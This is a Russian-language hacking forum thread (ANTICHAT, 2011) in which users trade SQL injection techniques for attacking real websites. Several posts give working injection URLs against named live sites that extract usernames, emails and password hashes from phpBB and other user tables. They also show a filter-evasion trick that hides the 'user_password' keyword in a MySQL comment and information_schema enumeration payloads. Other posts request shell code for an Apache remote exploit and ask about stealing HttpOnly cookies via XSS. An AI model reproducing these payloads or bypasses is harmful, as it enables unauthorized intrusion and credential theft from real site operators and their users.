HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.02.2011, 09:00
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Wildking  
Запрос типа: http://ххх.ххх.ххх.ххх/addon/bossmap/index.php/ выдает ошибку:

Слеш в конце обязателен. Как такое получается и можно ли развить?
посмотри постом что передается..
 
Ответить с цитированием

  #2  
Старый 15.02.2011, 23:20
Wildking
Новичок
Регистрация: 11.02.2011
Сообщений: 22
С нами: 8026166

Репутация: 0
По умолчанию

И еще вопрос-просьба. Кодом шела может кто располагает, для открытия порта под эксплоит "Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit" ?
 
Ответить с цитированием

  #3  
Старый 16.02.2011, 16:25
boortyhuhtyu
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
С нами: 8039126

Репутация: -6


По умолчанию

как вывести информацию через xpatch injection там вроде в xml данные зранятся можно с примером
 
Ответить с цитированием

  #4  
Старый 16.02.2011, 18:29
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,user_email),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=

так выводит нормально, как только в запросе ставлю слово user_password , запретка сразу срабатывает...пару таких запросов и бан по айпи...вроде не новичек , но вот как обойти хз..какие мысли?
 
Ответить с цитированием

  #5  
Старый 16.02.2011, 19:09
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

Цитата:
Сообщение от Gorev  
http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,user_email),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=
так выводит нормально, как только в запросе ставлю слово user_password , запретка сразу срабатывает...пару таких запросов и бан по айпи...вроде не новичек , но вот как обойти хз..какие мысли?
Цитата:
Сообщение от None  
http://www.deva.ws/index.php?idAutor=-9+user_password
Not Acceptable
http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,/*!user_password*/),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=
 
Ответить с цитированием

  #6  
Старый 17.02.2011, 16:09
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Допустим есть сайт который стоит на одной базе mysql, а цмска стоит на другой к примеру cms.mysql можноли как нить при мускль иньекции с бд user.mysql выдернуть таблици с cms.mysql
 
Ответить с цитированием

  #7  
Старый 17.02.2011, 16:14
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

если я правильно понимаю, то:

1) структуру базы тащим так: union+select+1,2,group_concat(table_name)+from+inf ormation_schema.tables+where+table_schema='имя базы'

2) тянем данные так: union+select+1,2,group_conact(login,0x3a,pass)+fro m+database_name.table_name
 
Ответить с цитированием

  #8  
Старый 17.02.2011, 16:34
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от Seravin  
если я правильно понимаю, то:
1) структуру базы тащим так: union+select+1,2,group_concat(table_name)+from+inf ormation_schema.tables+where+table_schema='имя базы'
2) тянем данные так: union+select+1,2,group_conact(login,0x3a,pass)+fro m+database_name.table_name
это подействует в случае когда конкретно уже знаем какие таблици в базе и поля, знаю что точно есть другая база, как можно с одной просмотреть какие есть таблици и поля в другой базе, для примера:

_http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,concat_ws(0x3b,version(),database (),user()),3,4,concat_ws(0x3a,name,password)+from+ users--

а админка на WP:

_http://www.indiagatebkk.com/blog/wp-login.php
 
Ответить с цитированием

  #9  
Старый 17.02.2011, 16:41
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

там одна база

http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,2,3,4,group_concat%28schema_name% 29+from+information_schema.schemata--

грамотней попытайся задать вопрос
 
Ответить с цитированием

  #10  
Старый 17.02.2011, 21:21
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию

можно узнать куки через XSS иньекцию если стоит HTTPOnly флаг?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...